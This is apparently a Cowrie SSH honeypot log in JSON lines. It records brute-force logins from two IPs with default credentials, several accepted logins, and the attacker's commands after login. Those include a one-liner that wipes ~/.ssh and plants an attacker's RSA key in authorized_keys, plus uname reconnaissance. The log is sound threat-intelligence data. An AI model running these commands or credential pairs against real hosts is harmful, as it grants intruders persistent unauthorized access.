dsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:47:00.182350Z","src_ip":"212.227.235.229","session":"71e991a0dc53"}
{"eventid":"cowrie.login.failed","username":"daemon","password":"password","message":"login attempt [daemon/password] failed","sensor":"my-vps","timestamp":"2025-08-31T00:47:01.834923Z","src_ip":"212.227.235.229","session":"71e991a0dc53"}
{"eventid":"cowrie.session.closed","duration":"4.8","message":"Connection lost after 4.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:47:03.381693Z","src_ip":"212.227.235.229","session":"71e991a0dc53"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59942,"dst_ip":"1.2.3.4","dst_port":22,"session":"47423869cc65","protocol":"ssh","message":"New connection: 212.227.235.229:59942 (1.2.3.4:22) [session: 47423869cc65]","sensor":"my-vps","timestamp":"2025-08-31T00:47:07.816983Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:47:07.819530Z","src_ip":"212.227.235.229","session":"47423869cc65"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:47:08.056494Z","src_ip":"212.227.235.229","session":"47423869cc65"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58412,"dst_ip":"1.2.3.4","dst_port":22,"session":"c9953a5f067d","protocol":"ssh","message":"New connection: 212.227.125.160:58412 (1.2.3.4:22) [session: c9953a5f067d]","sensor":"my-vps","timestamp":"2025-08-31T00:47:08.132335Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:47:08.133375Z","src_ip":"212.227.125.160","session":"c9953a5f067d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:47:08.207476Z","src_ip":"212.227.125.160","session":"c9953a5f067d"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","message":"login attempt [root/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T00:47:08.445280Z","src_ip":"212.227.125.160","session":"c9953a5f067d"}
{"eventid":"cowrie.login.success","username":"root","password":"ASDFGHJKL","message":"login attempt [root/ASDFGHJKL] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:47:08.986003Z","src_ip":"212.227.235.229","session":"47423869cc65"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:47:09.482411Z","src_ip":"212.227.235.229","session":"47423869cc65"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T00:47:09.483466Z","src_ip":"212.227.235.229","session":"47423869cc65"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T00:47:09.485025Z","src_ip":"212.227.235.229","session":"47423869cc65"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:47:09.534498Z","src_ip":"212.227.125.160","session":"c9953a5f067d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:47:09.726262Z","src_ip":"212.227.235.229","session":"47423869cc65"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:47:10.260587Z","src_ip":"212.227.235.229","session":"47423869cc65"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T00:47:10.261288Z","src_ip":"212.227.235.229","session":"47423869cc65"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T00:47:10.499707Z","src_ip":"212.227.235.229","session":"47423869cc65"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:47:10.500622Z","src_ip":"212.227.235.229","session":"47423869cc65"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32904,"dst_ip":"1.2.3.4","dst_port":22,"session":"b5fbf8f29a95","protocol":"ssh","message":"New connection: 212.227.235.229:32904 (1.2.3.4:22) [session: b5fbf8f29a95]","sensor":"my-vps","timestamp":"2025-08-31T00:47:10.739816Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:47:10.746588Z","src_ip":"212.227.235.229","session":"b5fbf8f29a95"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:47:10.981525Z","src_ip":"212.227.235.229","session":"b5fbf8f29a95"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T00:47:11.932230Z","src_ip":"212.227.235.229","session":"b5fbf8f29a95"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:47:13.172933Z","src_ip":"212.227.235.229","session":"b5fbf8f29a95"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34090,"dst_ip":"1.2.3.4","dst_port":22,"session":"18d63755a795","protocol":"ssh","message":"New connection: 212.227.235.229:34090 (1.2.3.4:22) [session: 18d63755a795]","sensor":"my-vps","timestamp":"2025-08-31T00:47:13.408157Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:47:13.413412Z","src_ip":"212.227.235.229","session":"18d63755a795"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:47:13.648810Z","src_ip":"212.227.235.229","session":"18d63755a795"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:47:14.607190Z","src_ip":"212.227.235.229","session":"18d63755a795"}
{"eventid":"cowrie.session.closed","duration":"7.0","message":"Connection lost after 7.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:47:14.842929Z","src_ip":"212.227.235.229","session":"47423869cc65"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:47:14.848583Z","src_ip":"212.227.235.229","session":"18d63755a795"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47104,"dst_ip":"1.2.3.4","dst_port":22,"session":"75017c9325ab","protocol":"ssh","message":"New connection: 212.227.125.160:47104 (1.2.3.4:22) [session: 75017c9325ab]","sensor":"my-vps","timestamp":"2025-08-31T00:47:18.542447Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:47:18.543138Z","src_ip":"212.227.125.160","session":"75017c9325ab"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:47:18.623232Z","src_ip":"212.227.125.160","session":"75017c9325ab"}
{"eventid":"cowrie.login.failed","username":"git","password":"git123","message":"login attempt [git/git123] failed","sensor":"my-vps","timestamp":"2025-08-31T00:47:18.852969Z","src_ip":"212.227.125.160","session":"75017c9325ab"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:47:19.997567Z","src_ip":"212.227.125.160","session":"75017c9325ab"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49928,"dst_ip":"1.2.3.4","dst_port":22,"session":"3f7ac2c3cf08","protocol":"ssh","message":"New connection: 212.227.125.160:49928 (1.2.3.4:22) [session: 3f7ac2c3cf08]","sensor":"my-vps","timestamp":"2025-08-31T00:47:20.673062Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:47:21.170918Z","src_ip":"212.227.125.160","session":"3f7ac2c3cf08"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:47:21.172619Z","src_ip":"212.227.125.160","session":"3f7ac2c3cf08"}
{"eventid":"cowrie.login.failed","username":"daemon","password":"password","message":"login attempt [daemon/password] failed","sensor":"my-vps","timestamp":"2025-08-31T00:47:23.620119Z","src_ip":"212.227.125.160","session":"3f7ac2c3cf08"}
{"eventid":"cowrie.session.closed","duration":"4.8","message":"Connection lost after 4.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:47:25.458311Z","src_ip":"212.227.125.160","session":"3f7ac2c3cf08"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50912,"dst_ip":"1.2.3.4","dst_port":22,"session":"3d18630dcaf6","protocol":"ssh","message":"New connection: 212.227.125.160:50912 (1.2.3.4:22) [session: 3d18630dcaf6]","sensor":"my-vps","timestamp":"2025-08-31T00:47:28.945383Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:47:28.946255Z","src_ip":"212.227.125.160","session":"3d18630dcaf6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:47:29.020555Z","src_ip":"212.227.125.160","session":"3d18630dcaf6"}
{"eventid":"cowrie.login.failed","username":"ranger","password":"ranger123","message":"login attempt [ranger/ranger123] failed","sensor":"my-vps","timestamp":"2025-08-31T00:47:29.245798Z","src_ip":"212.227.125.160","session":"3d18630dcaf6"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:47:30.322767Z","src_ip":"212.227.125.160","session":"3d18630dcaf6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35916,"dst_ip":"1.2.3.4","dst_port":22,"session":"59bb6aeb1f4c","protocol":"ssh","message":"New connection: 212.227.125.160:35916 (1.2.3.4:22) [session: 59bb6aeb1f4c]","sensor":"my-vps","timestamp":"2025-08-31T00:47:39.329239Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:47:39.329976Z","src_ip":"212.227.125.160","session":"59bb6aeb1f4c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:47:39.403364Z","src_ip":"212.227.125.160","session":"59bb6aeb1f4c"}
{"eventid":"cowrie.login.success","username":"root","password":"1Q2W3E4R","message":"login attempt [root/1Q2W3E4R] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:47:39.667639Z","src_ip":"212.227.125.160","session":"59bb6aeb1f4c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:47:39.974135Z","src_ip":"212.227.125.160","session":"59bb6aeb1f4c"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T00:47:39.974883Z","src_ip":"212.227.125.160","session":"59bb6aeb1f4c"}
